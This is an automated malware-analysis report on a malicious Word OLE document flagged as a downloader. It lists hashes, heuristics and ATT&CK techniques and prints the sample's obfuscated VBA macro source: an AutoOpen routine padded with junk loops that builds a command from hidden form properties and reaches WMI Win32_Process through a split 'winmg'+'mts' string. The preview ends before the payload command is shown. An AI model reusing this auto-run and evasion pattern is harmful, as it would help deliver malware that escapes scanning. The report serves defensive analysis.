Office (OLE) malware analysis — malicious · 5aa042c4337f710c

MALICIOUS

Office (OLE)

151.0 KB Created: 2019-05-08 06:44:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: a8d545e874a6beee088fa411fa9f575f SHA-1: 2f1eb36bdc606ffba5eb7eeb497d901353e27f87 SHA-256: 5aa042c4337f710cdfbee3517a8f65cbe1d173bab103828cd3cff4deb3408eca

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1190 Exploit Public-Facing Application

The sample contains VBA macros with an AutoOpen function, indicating immediate execution upon opening. Critical heuristics indicate the use of WMI (Win32_Process.Create) via GetObject/CreateObject, a common technique for launching malicious processes. The obfuscation using split string literals for 'winmgmts' further suggests malicious intent. ClamAV also flagged this as a downloader.

Heuristics 8

ClamAV: Doc.Downloader.Smpowloadbb-6965298-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Smpowloadbb-6965298-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7481 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7481 bytes
SHA-256: `3a94cea38ac5832469e3f3ff172f0d0192b144374d0cbf928a1090c20acd0c28`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "k81796" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "X_1667_4" Attribute VB_Base = "0{A1E87136-6F6B-4B31-812F-75C8CB5D59ED}{5AC2E1ED-CF8A-4FA7-A059-6A1550D113CA}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "a0146718" Attribute VB_Name = "w6579506" Attribute VB_Name = "Y10483" Attribute VB_Name = "v0402_8" Attribute VB_Base = "0{62271D62-2103-4E25-A76B-0E8D05BAE4FE}{07B30E92-0078-420E-88F7-EC430DD2DC45}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "d9813111" Function F765808(z448983) While A77125 And u3720840 'u4436999X9602373A_3646X20045 'C9103528p91712s_19_1O2175153 'F6079722F0284166r19721n8495311 Wend While i8897_4 And t_1_2249 'i4368296f272427f498264i72334 'U31795L8407_7l4082_4z165_48 'P000011_O77_8061O487369n1353366 Wend Set F765808 = CVar(z448983) While Q5033_11 And X3_352 'M9242211h7_9209P5932860J6_163 'A393216Q81163O56_78o91865 'Q9_31399G293840r07576N699035 Wend While c7_5032 And d45411 'i_0158R45_46i596627I6109479 'w47207z848230O886533S27_03 'C4_4_0i075591N2477150K__015 Wend While I6583_2 And q3823_43 'i80_92_1F5798664n_786_83i10090 'i640609w586157D3606905i9_031 'V069024a9773910m_7118t_756312 Wend End Function Sub _ autoopen() On Error Resume Next While P1_5_150 And l8017977 'd74079a854255G76293D69805 'n488293T7557674A2205_8U98370 'm7_457i196135o4864963K849635 Wend While F02275 And D92_83 'q2267054J_978792n333058j529723_ 'O5039226b3616_r8223635J66865 'w15290N6_148F77234H_4_708 Wend While j565939 And u181_03 'Q6667_f8631157P47568E32217 'V00297i2120_q6_370_T0_7670 'f79_6917h942194i76_1758G638158 Wend Call X175321 While p212509 And j0707_5 'w7__0_90M44800_A503_4_4Q474373 'O1569444n_7778Q_8_88F7111852 'i02_8_71k9_7070R59__3P22766 Wend While M79941_ And R_2609 'i68651z9230175s09_51a_9615 'K21_06P4954448u_67175V_58959 'S864698j12718v771679w08116 Wend While V243__ And F278_24 'A46694N9906124S396076E_4_9157 'p7036834E6459_4W_197_9A9151799 'O08395i029902o0338854h597153 Wend End Sub Attribute VB_Name = "j45_4318" Function X175321() On Error Resume Next While s660676 And A2670_68 'h_22_065O8102340T283572X1507288 'B135684b787305w95986u06857_3 'J936266o52_28f3348079u219406 Wend While z084_956 And B575833 'd7308_17B2335_5V387160D863709 'A_5_38_5L353_989G40366p65632 'D6_178b47576t28823d07_5914 Wend While J658423_ And E76__75 'r495749i4674_6z031753o5277779 'D956484Z4662_H994305S_9__66 't75_4302M_18236E0_16044a91541 Wend r1577825 = X_1667_4.Y168_96.PasswordChar + v0402_8.Q3_285 + X_1667_4.Y168_96 + v0402_8.Q7_611 + X_1667_4.Y168_96 + X_1667_4.Y168_96.PasswordChar + v0402_8.V68210 + X_1667_4.Y168_96.ControlTipText + X_1667_4.Y168_96.PasswordChar + v0402_8.r75_25 + X_1667_4.Y168_96.ControlTipText + v0402_8.a2_901_ + X_1667_4.Y168_96.ControlTipText While j57648_ And X43140 'L461767M429350_p4198490V5361_ 'a___84X53_52_O26090i60179 'j551078s4889464o4492402f07_498 Wend While Q13675 And w7188363 'T27338_f9802361z83964U4_0920 'b107785N9_523F9251_c719_7 'u1_465N6146_38A2__629E58180 Wend While E323275 And q4188541 'N99856a74235o30_98_C5809687 'j469913f8182382Y799_4Y918619 'P52_69F196724o107667J0_2_032 Wend Set b2547_83 = F765808(GetObject("winmg" + "mts: ... (truncated)

SHA-256: 3a94cea38ac5832469e3f3ff172f0d0192b144374d0cbf928a1090c20acd0c28

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "k81796"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "X_1667_4"
Attribute VB_Base = "0{A1E87136-6F6B-4B31-812F-75C8CB5D59ED}{5AC2E1ED-CF8A-4FA7-A059-6A1550D113CA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "a0146718"

Attribute VB_Name = "w6579506"

Attribute VB_Name = "Y10483"

Attribute VB_Name = "v0402_8"
Attribute VB_Base = "0{62271D62-2103-4E25-A76B-0E8D05BAE4FE}{07B30E92-0078-420E-88F7-EC430DD2DC45}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "d9813111"
Function F765808(z448983)
         While A77125 And u3720840
'u4436999X9602373A_3646X20045
'C9103528p91712s_19_1O2175153
'F6079722F0284166r19721n8495311
      Wend
         While i8897_4 And t_1_2249
'i4368296f272427f498264i72334
'U31795L8407_7l4082_4z165_48
'P000011_O77_8061O487369n1353366
      Wend
Set F765808 = CVar(z448983)
         While Q5033_11 And X3_352
'M9242211h7_9209P5932860J6_163
'A393216Q81163O56_78o91865
'Q9_31399G293840r07576N699035
      Wend
         While c7_5032 And d45411
'i_0158R45_46i596627I6109479
'w47207z848230O886533S27_03
'C4_4_0i075591N2477150K__015
      Wend
         While I6583_2 And q3823_43
'i80_92_1F5798664n_786_83i10090
'i640609w586157D3606905i9_031
'V069024a9773910m_7118t_756312
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While P1_5_150 And l8017977
'd74079a854255G76293D69805
'n488293T7557674A2205_8U98370
'm7_457i196135o4864963K849635
      Wend
         While F02275 And D92_83
'q2267054J_978792n333058j529723_
'O5039226b3616_r8223635J66865
'w15290N6_148F77234H_4_708
      Wend
         While j565939 And u181_03
'Q6667_f8631157P47568E32217
'V00297i2120_q6_370_T0_7670
'f79_6917h942194i76_1758G638158
      Wend
Call X175321
         While p212509 And j0707_5
'w7__0_90M44800_A503_4_4Q474373
'O1569444n_7778Q_8_88F7111852
'i02_8_71k9_7070R59__3P22766
      Wend
         While M79941_ And R_2609
'i68651z9230175s09_51a_9615
'K21_06P4954448u_67175V_58959
'S864698j12718v771679w08116
      Wend
         While V243__ And F278_24
'A46694N9906124S396076E_4_9157
'p7036834E6459_4W_197_9A9151799
'O08395i029902o0338854h597153
      Wend
End Sub


Attribute VB_Name = "j45_4318"
Function X175321()
On Error Resume Next
         While s660676 And A2670_68
'h_22_065O8102340T283572X1507288
'B135684b787305w95986u06857_3
'J936266o52_28f3348079u219406
      Wend
         While z084_956 And B575833
'd7308_17B2335_5V387160D863709
'A_5_38_5L353_989G40366p65632
'D6_178b47576t28823d07_5914
      Wend
         While J658423_ And E76__75
'r495749i4674_6z031753o5277779
'D956484Z4662_H994305S_9__66
't75_4302M_18236E0_16044a91541
      Wend
r1577825 = X_1667_4.Y168_96.PasswordChar + v0402_8.Q3_285 + X_1667_4.Y168_96 + v0402_8.Q7_611 + X_1667_4.Y168_96 + X_1667_4.Y168_96.PasswordChar + v0402_8.V68210 + X_1667_4.Y168_96.ControlTipText + X_1667_4.Y168_96.PasswordChar + v0402_8.r75_25 + X_1667_4.Y168_96.ControlTipText + v0402_8.a2_901_ + X_1667_4.Y168_96.ControlTipText
         While j57648_ And X43140
'L461767M429350_p4198490V5361_
'a___84X53_52_O26090i60179
'j551078s4889464o4492402f07_498
      Wend
         While Q13675 And w7188363
'T27338_f9802361z83964U4_0920
'b107785N9_523F9251_c719_7
'u1_465N6146_38A2__629E58180
      Wend
         While E323275 And q4188541
'N99856a74235o30_98_C5809687
'j469913f8182382Y799_4Y918619
'P52_69F196724o107667J0_2_032
      Wend
Set b2547_83 = F765808(GetObject("winmg" + "mts:
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.